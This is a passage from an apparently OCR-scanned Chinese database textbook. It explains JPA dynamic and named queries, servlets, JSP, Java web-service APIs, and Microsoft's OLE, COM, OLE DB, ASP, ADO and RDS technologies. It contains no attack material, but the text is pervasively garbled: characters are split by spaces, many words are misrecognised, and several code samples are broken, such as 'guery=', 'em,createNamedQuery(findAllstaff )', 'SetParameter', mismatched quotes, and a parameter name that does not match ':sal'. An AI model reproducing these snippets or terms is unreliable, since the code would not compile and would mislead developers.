public <T> T find (Class<T> entityClass，Object primaryKey ); 根据 主 关 键 字 检索 一 个 实体 实例 
public void flush(); 与 数据 库 同步 实体 状态 


对 于 一 个 持久 化 实体 ， 如 果 其 联系 的 CascadeType 被 设置 为 PERSIST 或 ALL， 则 其 所 
有 关联 实体 的 状态 改变 也 都 将 持久 化 。 除 非 使 用 扩展 的 持久 化 上 下 文 ， 在 此 情形 下 ， 事务 结 
束 后 ， 那 些 关 联 实体 会 变 为 分 离 的 。 
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JPA 查询 API 

使 用 EJB 3.0 JPA 时 ， 查 询 用 Java 持久 化 查询 语言 ( Java Persistence Query Language， 
JPQL) 来 表达 ， 它 是 对 EJB-QL 的 一 种 扩展 。 然 而 ，EJB 3.0 JPA 解决 了 许多 EJB-QL 的 局 
限 ， 并 加 入 众多 新 的 特性 (例如 利用 EJB 3.0 EntityManager API 完成 批量 更 新 与 删除 、 连 接 
操作 、GROUP BY、HAVING、 投 影 、 子 查询 和 在 动态 查询 中 使 用 JPQL)， 是 一 款 强 有 力 的 
查询 语言 。 此 外 ， 得 益 于 数据 库 特 殊 的 查询 扩展 ， 原 本 的 SQL 语句 可 直接 用 于 查询 实体 。 

动态 查询 与 具名 (预定 义 ) 查询 动态 查询 是 运行 时 组 装 、 配 置 和 执行 的 查询 。 使 用 实 
体 管理 接口 的 createQuery 方法 可 以 创建 动态 查询 。 例 如 : 

Query query = em.createQuery("select s from Staff s where s.salary > ?1"); 


query.setParameter(1,10000); 
return query.getResultList(); 


具名 查询 采用 元 数据 与 实体 一 起 存储 ， 应 用 程序 可 以 根据 名 字 重 用 它 。 为 了 把 上 面 的 查 
询 用 作 具 名 查询 ， 可 在 实体 中 采用 NamedQuery 注解 标注 。 例 如 : 


@Entity 

@NamedQuery(name="findAllStaff", 
guery="select s from Staff s where s.salary > ?1") 
public abstract class Staff implements Serializable { 


} 

为 执行 具名 查询 ， 我 们 需要 首先 使 用 EntityManager 接口 的 createNamedQuery 方法 创建 
一 个 查询 实例 ， 如 下 : 

query = em,createNamedQuery(findAllstaff ); 


query.SetParameter(1,10000); 
return query.getResultList(); 


具名 参数 ”在 EJB-QL 查询 中 我 们 可 以 使 用 具名 参数 代替 位 置 参数 。 例 如 ， 我 们 用 以 下 
方式 重 写 上 述 的 查询 : 

"select s from Staff s where s.salary > :sal" 

在 查询 中 使 用 具名 参数 时 ， 必 须 设置 参数 : 


query = em.createNamedQuery("findAllStaff'); 
query.setParameter("salary", 10000); 
return query.getResultList(); 


关于 JPA 更 深入 的 探讨 超出 了 本 书 的 范畴 ， 感 兴趣 的 读者 可 以 参考 本 书 “ 深 入 阅读 ”部 
分 本 章 的 参考 文献 了 解 更 多 JPA 相关 内 容 。 


29.7.7 Java servlet 


servlet 是 一 种 编程 语言 ， 运 行 于 支持 Java 的 Web 服务 器 上 ， 能 够 用 来 开发 网 页 ， 类 似 
于 29.4 节 讨论 的 CGI 程序 。 然 而 ，servlet 有 一 些 CGI 所 不 具备 的 优点 ， 包 括 : 
@ 改良 了 性 能 。CGI 为 每 个 请 求 创 建 一 个 单独 的 进程 。 而 servlet 则 是 用 Java 虚拟 机 中 的 
轻 量 级 线程 处 理 每 个 请 求 。 此 外 ，servlet 中 不 同 的 请 求 是 处 于 它们 的 共享 内 存 中 的 ， 
而 CGI 程序 (可 能 也 是 一 个 运行 时 系统 或 解释 器 ) 则 对 于 每 个 请 求 都 需要 重新 载 人 
和 运行 。 当 请 求 的 数目 增加 时 ，servlet 具有 比 CGI 更 好 的 性 能 。 
@ 可 移植 。Java servlet 继承 了 Java 的 “一 次 编写 ， 到 处 运行 ”特性 。 而 CGI 的 可 移植 
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性 很 差 ， 是 和 特定 Web 服务 器 绑 定 的 。 

可 扩展 。Java 是 一 个 健壮 的 、 完 全 面向 对 象 的 语言 。Java servlet 可 以 利用 任何 现 有 
的 Java 代码 ， 并 且 可 以 访问 Java 平 台所 具有 的 大 量 API， 包 括 基 于 JDBC 的 数据 库 
访问 、E-mail、 目 录 服 务 器 、CORBA、RMI 和 EJB。 

会 话 管理 简单 。 典 型 的 CGI 程序 通过 在 客户 端 或 服务 器 端 使 用 cookie 来 维持 会 话 状 
态 信息 。 然 而 cookie 并 不 能 解决 在 CGI 程序 和 数据 库 间 保持 会 话 生 存 的 问题 ， 每 个 
客户 会 话 仍然 需要 重新 建立 或 保持 连接 。 而 servlet 可 以 维持 会 话 状 态 信 息 ， 因 为 它 
是 持久 的 ， 它 会 处 理 所 有 的 客户 请 求 直 到 它 被 Web 服务 器 关闭 [或 者 通过 destroy() 
方法 显 式 地 关闭 ]。 另 外 一 个 维持 会 话 状态 信息 的 技术 是 创建 线程 会 话 类 ， 以 在 
servlet 中 储存 和 维持 每 个 客户 请 求 。 当 客户 端 第 一 次 请 求 时 ， 客 户 被 赋予 一 个 新 的 
Session 对 象 和 一 个 唯一 的 会 话 ID ， 这 些 被 存放 在 servlet 的 散 列表 中 。 当 客户 发 出 
另 一 个 请 求 时 ， 传 送 会 话 ID ， 重 新 获取 Session 对 象 信息 来 重建 会 话 状 态 。 同 时 将 
为 每 个 对 话 创 建 一 个 计时 器 线程 对 象 来 监视 由 于 对 话 不 再 活动 而 导致 的 会 话 超时 。 
改进 了 安全 性 和 可 靠 性 。Java 内 置 的 安全 模型 使 servlet 在 安全 性 上 得 到 保障 。 此 外 
servlet 也 继承 了 Java 的 类 型 安全 性 ， 这 使 servlet 更 加 可 靠 。 

Java servlet 开发 工具 箱 (Java Servlet Development Kit，JSDK) 包含 javax.servlet 和 
javax.servlet.http 包 ， 它 包括 开发 servlet 所 必需 的 类 和 接口 。 关 于 servlet 的 进一步 讨论 超出 
了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参考 此 领域 中 的 其 他 书籍 ， 例 如 Hall 和 Brown ( 2003 )、 
Perry (2004 ) 和 Wutka ( 2002 )。 


29.7.8 JSP 


JSP (JavaServer Page) 是 一 个 基于 Java 的 服务 器 端 脚 本 语言 ， 它 允许 静态 产生 的 
HTML 和 动态 产生 的 HTML 相 混 合 。HTML 开发 者 可 以 使 用 一 般 的 网 页 开发 工具 (例如 
Microsoft 的 FrontPage 和 Adobe 的 Dreamweaver) 生成 网 页 ， 然 后 编辑 HTML 文件 并 用 特 
殊 的 标记 嵌入 动态 内 容 。JSP 在 绝 大 多 数 的 Web 服务 器 上 都 可 正常 工作 ， 如 Apache HTTP 
Server 和 Microsoft IS ( 需 安 装 IBM 的 WebSphere、Adobe 的 JRun 4 或 New Atlanta 的 
ServletExec 等 插件 )。 在 后 台 ，JSP 被 编译 为 Java servlet， 并 被 支持 Java 的 Web 服务 器 所 
处 理 。 

除了 常规 的 HTML 之 外 ， 可 以 嵌入 到 网 页 中 的 JSP 结构 还 有 三 种 类 型 : 

@ 脚本 元 素 (scriptlet): 允许 指定 的 Java 代码 成 为 servlet 的 一 部 分 。 

e 指令 : 给 JSP 引擎 来 控制 servlet 的 整体 结构 。 

e 操作 (标记 ) : 允许 使 用 现存 的 组 件 (比如 JavaBean)。 可 以 预见 ， 大 多 数 JSP 的 处 

理 都 通过 依赖 于 具体 JSP 的 基于 XML 的 标记 来 实现 。JSP 包括 许多 标准 标记 ， 比 如 
jsp:bean (声明 使 用 JavaBean 组 件 的 一 个 实例 )，jsp:setProperty (设置 Bean 中 的 属性 
值 ) 和 jsp:getProperty (获取 Bean 的 属性 值 ， 把 它 转换 为 字符 串 ， 并 放置 到 隐 式 对 
象 “out” 中 )。 

JSP 引擎 将 JSP 标记 、Java 代码 和 静态 的 HTML 内 容 转换 为 Java 代码 ， 然 后 由 JSP 引 
擎 自动 地 组 织 成 底层 的 Java servlet， 该 servlet 被 自动 编译 成 Java 字 节 代码 。 因 而 当 网 站 访 
问 者 浏览 JSP 网 页 时 ， 已 经 生成 的 预 编 译 servlet 就 会 完成 所 有 工作 。 既 然 servlet 是 编译 好 
的 ， 那 么 网 页 中 的 JSP 代码 就 没有 必要 在 每 次 请 求 该 网 页 时 都 解释 一 遍 。JSP 引擎 只 在 代码 
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最 近 一 次 改动 后 才 有 必要 编译 一 次 ， 生 成 servlet， 其 后 只 需 执 行 编译 好 的 servlet。 由 于 是 
JSP 引擎 而 不 是 JSP 开发 者 自动 地 生成 和 编译 servlet， 因 而 JSP 可 以 提供 高 效 快 速 的 程序 开 
发 ， 不 需要 人 工 编译 代码 。 

对 JSP 的 全 面 讨论 超出 了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参考 该 领域 中 的 其 他 书籍 ， 比 
如 Bergsten ( 2003 )，Hanna (2003)， 以 及 Wutka (2002 ) 。 在 29.8.4 节 中 ， 将 对 JSP 和 
ASP 进行 比较 。 


29.7.9 Java Web 服务 


29.2.5 节 介 绍 了 Web 服务 的 概念 ，J2EE 提供 了 一 系列 API 和 工具 来 支持 Web 服务 和 客 
户 的 互 操作 ， 主 要 有 两 类 

e 面向 文档 的 API- 直接 处 理 XML 文档 ; 

e 面向 过 程 的 API- 处 理 过 程 。 

面向 文档 的 

JEE 中 面向 文档 的 API 有 以 下 这 些 : 

e 用 于 XML 处 理 的 Java API ( JAXP)， 主 要 是 使 用 多 种 解析 器 和 转换 器 来 处 理 XML 
文档 。JAXP 既 支 持 SAX( 用 于 XML 解析 的 简单 API) 也 支持 DOM( 文 档 对 象 模型 )， 
因此 XML 可 以 被 解析 成 事件 流 或 者 一 个 树 型 表示 。JAXP 还 支持 XSLT 标准 ， 多 许 
Java 开发 人 员 将 数据 转换 成 其 他 XML 文档 或 者 别 的 格式 ， 例 如 HTML。 通 过 建立 
一 个 “可 插 拔 ” 层 ， 可 以 插 和 人 任何 XML 兼容 的 SAX 和 DOM API。 这 一 层 还 可 以 插 
入 XSL 处 理 器 ， 人 允许 用 多 种 方式 转换 XML 数据 ， 包 括 被 显示 的 方式 。 

JAXP 现在 也 支持 XML 的 流 API ( StAX)， 它 是 基于 树 和 基于 事件 处 理 的 混合 。 用 

StAX， 编 程 人 口 点 是 表示 XML 文档 中 一 个 点 的 游标 。 应 用 程序 可 以 向 前 移动 游标 ， 

从 解析 器 “ 拉 取 ”所 需 信 息 (而 SAX 向 应 用 程序 “推送 ”信息 )。 

e 用 于 XML 绑 定 的 Java 体系 结构 (JAXB )， 主 要 是 使 用 模式 导出 的 JavaBeans 组 件 类 

来 处 理 XML 文档 。 在 这 个 处 理 过 程 中 ，JAXB 提供 了 方法 ,将 XML 实例 文档 分 解 

为 一 棵 Java 对 象 树 ， 再 将 这 棵 树 集结 成 XML 文档 。JAXB 提供 了 一 种 方便 的 方法 来 

绑 定 XML 模式 和 Java 代码 描述 的 表示 形式 ， 这 样 Java 开发 者 可 以 方便 地 在 Java 应 

用 中 包含 XML 数据 以 及 处 理 函 数 ， 即 使 对 XML 了 解 不 多 也 没有 关系 。 

带 附 属 API 的 SOAP ( SAAJ)， 主 要 是 提供 一 种 标准 的 方法 在 Internet 上 从 Java 平 

台 发 送 XML 文档。 SAAJ 主要 是 基于 SOAP1.1 和 带 附属 规范 的 SOAP， 它 们 定义 

了 交换 XML 消息 的 基本 框架 。 

面向 过 程 的 

JEE 中 面向 过 程 的 API 有 以 下 这 些 : 

e 支持 基于 XML 的 RPC 的 Java API ( JAX-RPC )， 主 要 用 于 在 Internet 上 向 远程 用 户 
发 送 SOAP 方法 调用 ， 并 接受 结果 。 通 过 JAX-RPC， 使 用 别 的 语言 的 客户 也 可 以 访问 
在 Java 平台 开发 的 Web 服务 。 相 反 ， 使 用 Java 的 客户 端 也 可 以 访问 其 他 语言 平台 上 
开发 的 Web 服务 。JAX-RPC 为 开发 Web 服务 客户 端 和 终端 提供 了 WSDL-to-Java 和 
Java-to-WSDL 映射 。JAX-RPC 作为 遗留 物 ， 不 再 提供 更 新 。 

e 支持 基于 XML 的 Web service 的 Java API ( JAX-WS )， 它 取代 JAX-RPC 用 于 开发 
基于 SOAP 的 Web 服务 。 通 过 提供 多 种 协议 ，JAX-WS 解决 了 许多 JAX-RPC 1.1 不 
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能 解决 的 问题 。JAX-WS 使 用 JAXR 2.0 进行 数据 绑 定 ， 支 持 定制 服务 终端 界面 。 与 
此 同时 ，JAX-WS 支持 注解 ， 简 化 了 Web 服务 开发 流程 ， 减 少 了 运行 时 JAR。 虽 然 
SOAP 消息 很 复杂 ， 但 是 JAX-WS API 为 开发 者 隐藏 了 复杂 性 ， 并 且 JAX-WS 运行 时 
系统 负责 转换 API 调用 、 响 应 发 往 和 来 自 SOAP 的 消息 。 

支持 RESTful 的 Web 服务 的 Java API ( JAX-RS)， 它 用 于 开发 基于 REST 的 Web 
服务 。 与 基于 SOAP 的 Web 服务 相 比 ， 基 于 REST 的 Web 服务 可 以 更 好 地 集成 
HTTP， 并 且 不 需要 XML 消息 或 者 WSDL 定义 ( 详 见 3.2.1 节 )。 

用 于 XML 注册 项 的 Java API ( JAXR )， 主 要 提供 了 标准 的 方法 来 访问 商务 注册 项 和 
共享 信息 。JAXR 为 Java 开发 商 提供 了 标准 的 方法 ， 可 以 基于 开放 标准 (如 ebXML ) 
或 者 工业 社团 标准 (例如 UDDI)。 


29.8 Microsoft 的 Web 解决 平台 


Microsoft 的 .NET 是 Microsoft 的 最 新 Web 平 台 ， 是 第 三 代 的 Internet， 在 .NET 中 
“软件 作为 一 种 服务 被 传送 ， 对 任何 设备 ， 可 在 任何 时 候 、 任 何 地 点 进行 访问 ， 是 完全 可 编 
程 的 、 个 性 化 的 ” 。 为 了 帮助 理解 这 些 成 分 ， 首 先 讨论 Microsoft 技术 的 组 成 ,包括 OLE、 
COM、DCOM 和 现在 的 .NET 技术 。 

对 象 链接 和 内 入 (OLE ) 

在 早期 Microsoft 的 Windows 环境 中 ， 用 户 通过 剪贴 板 复制 和 粘贴 数据 ， 从 而 在 应 用 程 
序 之 间 共 享 数据 。 在 20 世纪 80 年 代 后 期 ，Microsoft 实现 了 动态 数据 交换 ( Dynamic Data 
Exchange，DDE) 协议 ， 以 更 加 动态 的 方式 实现 了 剪贴 板 功能 。 然 而 ，DDE 速度 比较 慢 ， 
可 靠 性 差 。 在 1991 年 ，Microsoft 推出 了 对 象 链接 和 租 人 ( Object Linking and Embedding， 
OLE) 版 本 1.0， 有 效 地 替代 了 DDE。 

OLE 是 一 种 面向 对 象 技术 ， 可 促进 可 重用 软件 组 件 的 开发 。 传 统 的 过 程 编程 中 每 个 
组 件 各 自 实现 所 要 求 的 功能 ，OLE 替代 了 这 种 方法 ， 它 允许 程序 使 用 提供 特定 功能 的 共享 
对 象 。 对 象 包 括 有 文本 文档 、 图 表 、 电 子 表格 、 电 子 邮件 消息 、 图 形 和 声音 片段 等 所 有 被 
OLE 当 作 对 象 的 片段 。 当 舱 入 或 链接 对 象 时 ， 这 些 对 象 就 出 现在 客户 应 用 程序 中 。 当 需要 
编辑 链接 的 数据 时 ， 用 户 可 以 双击 该 对 象 ， 就 会 启动 创建 该 对 象 的 应 用 程序 。 

组 件 对 象 模型 (COM ) 

Microsoft 扩展 了 无 缝隙 的 对 象 集成 这 个 概念 ， 人 允许 从 一 个 程序 到 另外 一 个 程序 之 间 创 
建 和 仍 人 可 提供 某 种 功能 的 功能 组 件 。 这 促进 了 组 件 对 象 思想 的 产生 ， 即 为 其 他 客户 端 应 用 
提供 服务 的 对 象 。 组 件 对 象 模型 ( Component Object Model，COM) 即 组 件 解决 方案 ， 它 是 
基于 对 象 的 模型 ， 由 系统 中 接口 之 间 所 定义 的 规范 和 具体 实现 组 成 ， 并 打包 成 动态 链接 库 
(Dynamic Link Library，DLL )。 

COM 是 一 种 服务 ， 在 客户 端 应 用 和 对 象 以 及 相关 服务 之 间 建 立 连 接 。COM 提供 了 寻找 
和 初始 化 对 象 ， 以 及 在 客户 端 和 组 件 之 间 进 行 通信 的 标准 方法 。COM 组 件 的 巨大 功能 之 一 
就 是 它 提供 了 二 进 制 互 操 作 标准 。 换 名 话说， 把 客户 端 和 对 象 组 合 到 一 起 的 方法 独立 于 任何 
创建 客户 端 程序 和 对 象 的 编程 语言 。 在 1993 年 ，OLE 2.0 中 实现 了 COM。 

分 布 式 组 件 对 象 模 型 (DCOM ) 

COM 提供 了 可 跨 桌 面 应 用 程序 共享 的 二 进 制 兼容 组 件 的 体系 结构 和 机 制 。Microsoft 
下 一 步 发 展 策略 就 是 提供 可 跨 企业 的 功能 。 分 布 式 组 件 对 象 模型 ( Distributed Component 
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Object Model，DCOM) 扩展 了 COM 体系 ， 它 提供 一 种 分 布 式 的 基于 组 件 的 计算 环境 ， 允 
许 在 远程 机 器 的 客户 端 可 以 像 在 本 地 机 器 上 一 样 使 用 组 件 。DCOM 做 到 这 一 点 主要 是 通过 
使 用 一 种 合适 的 网 络 协议 来 蔡 换 客户 端 和 组 件 之 间 的 交互 通信 过 程 。DCOM 非常 适用 于 3.1 
节 中 讨论 的 三 层 体 系 结构 。 

Web 解决 平台 

Microsoft 最 近 发 布 的 COM+， 提 供 了 向 上 兼容 的 、 更 加 丰富 的 服务 集 ， 可 使 开发 人 员 
更 容易 地 创建 更 新 颖 的 应 用 程序 。COMY+ 的 目标 是 为 应 用 程序 提供 更 多 的 基础 架构 ， 使 开发 
商 能 够 不 再 依赖 于 应 用 逻辑 。COM+ 为 Microsoft 统一 和 集成 PC 与 Internet 的 新 体系 结构 框 
架 提供 了 基础 设施 。Web 解决 方案 平台 是 “为 建立 现代 化 的 、 大 规模 的 、 多 层 分 布 式 计 算 方 
法 的 一 种 体系 框架 ， 它 可 以 在 任何 网 络 上 传输 ” 。 它 定义 了 通用 的 服务 集 ， 包 括 组 件 、Web 
浏览 器 和 服务 器 、 脚 本 、 事 务 、 消 息 队 列 、 安 人 全、 目录、 系统 管理 、 用 户 接口 以 及 用 户 视 角 
的 数据 库 服务 和 数据 访问 。 

这 个 体系 结构 中 有 很 多 核心 组 件 ， 在 此 仅 关 心 ASP (Active Server Page) 和 ADO (ActiveX 
Data Object)。 在 讨论 这 些 组 件 之 前 ， 简 要 地 讨论 一 下 Microsoft 的 通用 数据 访问 策略 ， 这 有 助 
于 理解 要 讨论 的 组 件 是 如 何 适 用 于 这 种 策略 的 。 


29.8.1 通用 数据 访问 


Microsoft 的 ODBC 技术 提供 了 访问 多 种 SQL 数据 库 的 通用 接口 〈 参 见 附录 I3 )。ODBC 
作为 访问 数据 的 标准 ， 基 于 SQL 语言 。 这 个 接口 (由 C 语 言 编译 而 成 ) 提供 了 很 高 的 互 操 
作 性 : 单个 应 用 程序 通过 通用 代码 集 可 以 访问 不 同 的 SQL DBMS。 这 样 可 使 得 程序 开发 人 
员 不 需要 指定 特定 的 DBMS 就 可 以 生成 和 发 布 客户 - 服务 器 应 用 程序 。 尽 管 ODBC 被 认 
为 是 提供 数据 的 一 个 很 好 的 接口 ， 但 是 作为 编程 接口 它 还 有 很 多 局 限 性 。 许 多 人 都 在 试图 
设法 封装 这 个 难以 使 用 的 接口 。Microsoft 最 后 将 Access 和 封装 了 具有 带 DAO (Data Access 
Object， 数 据 访 问 对 象 ) 的 Visual Studio 打包 在 一 起 。DAO 对 和 象 模型 由 许多 对 象 组 成 ， 比 
如 Databases 、TableDefs 、QueryDefs 、Recordsets 、 字 段 和 属性 等 。DAO 设计 的 目的 就 
是 实现 对 Microsoft Access 的 底层 数据 库 技术 的 直接 访问 ， 虽 然 JET 数据 库 引 擎 并 不 是 与 
ODBC 很 匹配 。 为 了 提供 可 以 用 于 Microsoft 其 他 数据 库 产 品 ， 比 如 Visual FoxPro 和 SQL 
Server 的 数据 模型 ， 为 了 解决 DAO 对 Access 程序 设计 人 员 的 吸引 力 越 来 越 小 的 问题 ， 
Microsoft 在 Visual Basic 4.0 企业 版 中 推出 了 RDO ( Remote Data Object， 远 程 数据 对 象 ) 
规范 。 

Microsoft 定义 了 一 系列 数据 对 象 ， 集 合 起 来 命名 为 OLE DB (Object Linking and 
Embedding for DataBase， 数 据 库 对 象 链 接 与 戏 入 )， 人 允许 面向 OLE 的 应 用 程序 共享 和 操作 
数据 对 象 集 。OLE DB 提供 了 对 任何 数据 源 的 底层 访问 ， 包 括 关 系 型 数据 库 和 非 关 系 型 数 
据 库 、 电 子 邮件 和 文件 系统 、 文 本 和 图 形 、 客 户 业 务 对 象 等 ， 如 图 29-22 所 示 。OLE DB 
是 一 个 面向 对 象 的 基于 C++API 的 规范 。 因 为 组 件 可 以 看 作 是 融和 人 到 一 个 安全 、 可 重用 对 
象 中 进程 与 数据 的 组 合 ， 所 以 组 件 可 以 同时 被 作为 数据 消费 者 ( data consumer) 和 数据 提 
供 者 ( data provider) 来 对 待 : 消费 者 从 OLE DB 接口 中 提取 数据 ， 提 供 者 向 OLE DB 接 
口 发 布 数据 。 
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29-22 ”OLE DB 体系 结构 


29.8.2 ASP 和 ADO 


ASP (Active Server Pages) 是 一 种 编程 模型 ， 可 允许 在 Web 服务 器 上 创建 动态 的 、 可 
交互 的 网 页 ， 类 似 于 上 一 节 中 讨论 的 JSP。 这 种 网 页 可 以 基于 用 户 所 使 用 的 浏览 器 类 型 ， 基 
于 用 户 机 器 所 能 支持 的 语言 ， 基 于 用 户 所 选择 的 个 人 主题 。ASP 是 和 Microsoft 的 IIS 3.0 一 
同 引 入 的 ， 支 持 ActiveX 脚本 ， 如 果 有 必要 ， 可 在 单个 ASP 脚本 中 使 用 大 量 不 同 的 脚本 引 
擎 。Microsoft 也 为 VBScript ( ASP 的 默认 脚本 语言 ) 和 JScript 提供 了 本 地 支持 。ASP 的 体 
系 结构 如 图 29-23 所 示 。 





PC 客户 端 


29-23 ASP 体系 结构 


ASP 具有 了 CGI 程序 的 灵活 性 ， 却 没有 前 面 讨 论 过 的 性 能 负载 问题 。 与 CGI 不 同 ， 
ASP 的 运行 与 服务 器 进程 同步 ， 可 以 多 线程 优化 处 理 大 量 用 户 请 求 。ASP 文件 是 以 “ .asp” 
作为 后 缀 的 ， 可 以 含有 下 面 的 内 容 : 

e 文本 。 

e HTML 标记 ， 由 通常 的 尖 括 号 (< 和 >) 括 起 来 。 

。 脚本 命令 和 输出 表达 式 ， 由 <% 和 %> 符号 括 起 来 。 
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当 浏览 器 从 Web 服务 器 上 请 求 “ .asp” 文 件 时 ，ASP 脚本 就 开始 执行 。 然 后 ，Web 服 
务 器 调用 ASP，ASP 然后 就 从 头 到 尾 读 取 请 求 的 文件 ， 执 行 每 一 条 命令 ， 向 浏览 器 发 送 生 
成 的 HTML 页 面 。 在 服务 器 端 生 成 的 HTML 文件 中 简单 地 包含 脚本 作为 文本 ， 就 能 生成 客 
户 端 脚本 。 

ADO (ActiveX Data Objects ) 

ADO 是 对 ASP 的 一 个 编程 扩展 ， 它 提供 了 数据 库 连 接 能 力 并 被 IS 所 支持 。ADO 支持 
下 面 的 特性 (尽管 一 些 底 层 的 数据 库 引 擎 不 支持 这 些 特性 ); 

e 独立 创建 对 象 。 

e 支持 存储 程序 ， 能 带 输入 和 输出 参数 以 及 返回 参数 。 

e 不 同 的 游标 类 型 ， 包 括 对 不 同 后 端 游标 的 潜在 支持 。 

e 以 批 处 理 方式 进行 更 新 。 

@ 支持 对 返回 的 行 数 以 及 其 他 查询 目标 的 限制 。 

e 支持 由 存储 程序 或 批 处 理 语句 返回 的 多 个 记录 和 集 。 

ADO 的 设计 目标 就 是 一 种 容易 使 用 的 应 用 级 的 OLE DB 的 接口 。 现 在 市 场 上 的 许多 工 
有 具 和 语言 都 实现 了 通过 OLE Automation 接口 调用 ADO。 进 一 步 地 ， 因 为 ADO 集 中 了 RDO 
和 DAO 的 优点 ， 甚 至 是 取代 了 RDO 和 DAO， 所 以 它 使 用 起 来 很 方便 ， 编 程 习惯 和 语法 也 
比较 相似 。ADO 最 大 的 优点 就 是 易 使 用 、 高 速 、 低 内 存 开 销 和 低 磁盘 占用 。 图 29-24a 中 的 
ADO 对 象 模型 由 对 象 和 集合 组 成 ， 如 表 29-7 所 示 。 





a) ADO 对 象 模型 b) ADO.NET 对 象 模型 
图 29-24 


表 29-7 主要 的 ADO 对 象 和 集合 类 型 


表示 与 数据 源 关 联 的 一 个 会 话 ，open 方法 用 于 打开 这 个 数据 源 
Error 对 象 包含 与 涉及 数据 提供 者 的 单个 操作 关联 的 数据 访问 错误 的 细节 信息 
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( 续 ) 
对 象 / 集 描 述 
Error 集 包含 在 响应 涉及 数据 提供 者 的 单个 故障 时 创建 的 所 有 错误 对 象 
命令 对 象 表示 针对 一 个 数据 源 (例如 ， 一 条 SQL 语句 ) 要 执行 的 特定 命令 
参数 对 象 表示 基于 一 个 参数 化 查询 或 存储 过 程 的 命令 对 象 相关 联 的 参数 或 自 变量 
参数 集 包含 一 个 命令 对 象 的 所 有 参数 对 象 


表示 一 个 基本 表 中 的 所 有 记录 或 者 一 条 执行 命令 的 结果 集合 。 所 有 的 记录 集 对 象 包含 了 记 
录 ( 行 ) 和 域 ( 列 )。 任 何 时 候 ，Recordset 对 象 只 涉及 集合 中 单个 记录 作为 当前 记录 。Open 方 
法 用 于 打开 与 一 个 Recordset (一 条 SQL 语句 、 一 个 表 名 、 一 次 存储 过 程 调用 ， 或 者 一 个 持久 
Recordset 的 文件 名 ) 相关 的 数据 源 。 移 动 记录 可 以 使 用 以 下 方法 : 
记录 集 对 象 。 MoveFirst 移动 当前 记录 的 位 置 为 记录 集 的 首部 
。 MoveLast 移动 当前 记录 的 位 置 为 记录 集 的 尾部 
。 MoveNext 将 当前 记录 向 记录 集 尾 部 方向 前 移 一 位 。 如 果 当 前 记录 是 最 后 一 条 记录 ， 并 且 
调用 了 MoveNext 操作 ，ADO 将 当前 记录 指针 移动 到 最 后 一 条 记录 之 后 (此 时 EOF 为 真 )。 
如 果 在 EOF 为 真 时 ， 还 调用 Movenext 操作 ， 则 产生 一 个 错误 


字段 对 象 表示 有 具有 某 种 通用 数据 类 型 的 一 列 数据 
字段 集 包含 一 个 Recordset 对 象 中 所 有 的 字段 对 象 
记录 对 象 表示 单行 数据 ， 或 来 自 Recordset 或 来 自 数据 提供 者 


包含 二 进 制 流 或 者 文本 数据 。 例 如 ， 一 个 XML 文档 能 被 加 载 到 流 中 作为 命令 输入 ， 或 者 从 


流 对 象 某 个 提供 者 返回 作为 查询 结果 。 流 对 象 能 用 于 操作 包含 这 些 流 数据 的 字段 或 记录 


29.8.3 ”远程 数据 服务 


远程 数据 服务 (Remote Data Service，RDS) (以 前 称 为 高 级 数据 连接 器 (Advanced Data 
Connector，ADC)) 是 Microsoft 推出 的 一 种 通过 Internet 客户 端 操 作 数 据 库 的 技术 。RDS 
在 服务 器 端 仍旧 使 用 ADO 来 执行 查询 ， 返 回 记录 集 到 客户 端 ， 客 户 端 能 在 记录 集 上 执行 另 
外 的 查询 。 而 RDS 提供 一 种 机 制 ， 能 将 更 新 后 的 记录 发 送 到 Web 服务 器 上 。RDS 提供 了 一 
种 有 效 的 缓冲 机 制 ， 借 此 能 减少 Web 服务 器 的 访问 次 数 ， 从 而 提高 应 用 程序 的 整体 性 能 。 

虽然 RDS 改进 了 客户 端的 数据 访问 ， 但 是 它 缺 乏 ADO 的 灵活 性 ， 因 此 并 未 打算 替代 
ADO。 例如，ADO 维持 连接 ， 而 RDS 总 是 在 未 连接 记录 集 上 工作 。 

RDS 是 作为 客户 端的 ActiveX 控件 实现 的 ， 包 含 在 IE 5 及 以 上 版 本 中 ， 名 字 为 RDS. 
DataControl。 要 建立 一 个 数据 库 连接 ， 可 以 在 网 页 上 放置 一 个 DataControl 对 象 。 默 认 情 况 
下 ， 该 对 象 会 建立 一 个 它 本 身 到 服务 器 上 对 象 DataFactory 的 连接 。 这 个 对 象 是 ADO 安装 
的 一 部 分 (和 对 象 DataControl 一 样 )， 它 的 功能 就 是 根据 客户 的 愿望 提出 请 求 ， 并 返回 结果 
值 到 客户 端 。 例 如 ， 在 网 页 中 放置 一 个 DataControl 对 象 ， 如 下 所 示 : 

<OBJECT CLASSID= "clsid:BD96C556-65A3-11D0-983A-00C04FC29E33” 

ID="ADC”> 
<PARAM NAME="“SQL” VALUE="“SELECT * FROM Staff”> 
<PARAM NAME="“Connect” VALUE=“DSN=DreamHomeDB;”> 
<PARAM NAME="Server” VALUE="“http://www.dreamhome.co.uk/”> 

</OBJECT> 

当 这 个 页 面 被 载 人 时 ，Internet Explorer 创建 一 个 DataControl 对 象 实例 ， 赋 了 予 它 的 
ID 为 ADC， 然 后 传人 三 个 连接 参数 。 下 一 步 就 是 绑 定 一 个 控件 。 例 如 ， 可 以 使 用 上 面 的 
DataControl 对 象 把 Staff 表 中 的 每 一 个 值 都 传递 到 HTML 表格 中 : 
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<TABLE DATASRC="“#ADC” border=1> 
<TR><TD><SPAN DATAFLD= “staffNo” > </SPAN> </TD></TR> 
</TABLE> 
当 把 DataControl 控件 与 HTML 表格 绑 定时 ， 包 括 在 TABLE 标记 内 的 所 有 数据 都 作为 
一 个 模板 类 来 使 用 ， 换 句 话 说， 表格 中 的 一 行 正 好 对 应 记录 集中 的 一 条 记录 。 在 我 们 的 模板 
中 ， 在 每 一 行 的 数据 单元 格 中 指定 了 一 个 SPAN， 把 它 链接 到 对 象 DataControl 所 绑 定 的 表 
的 staffNo 列 上 ， 在 本 例 中 就 是 Staff 表 。 


29.8.4 ASP 和 JSP 的 比较 


在 29.7.8 节 中 讨论 了 JSP 技术 ， 它 和 ASP 很 相似 。ASP 和 JSP 设计 的 目的 都 是 通过 对 
可 调用 组 件 的 使 用 使 得 开发 人 员 把 页 面 设计 和 编程 逻辑 分 开 ， 都 提供 了 能 替代 CGI 编程 且 
能 简化 网 页 开发 和 布局 的 方案 。 然 而 ， 它 们 之 间 还 有 很 多 区 别 ， 下 面 简要 介绍 一 下 : 
e 平台 和 服务 器 独立 性 。JSP 符合 “一 次 编写 ， 到 处 运行 ”的 Java 理论 。 因 而 ，JSP 
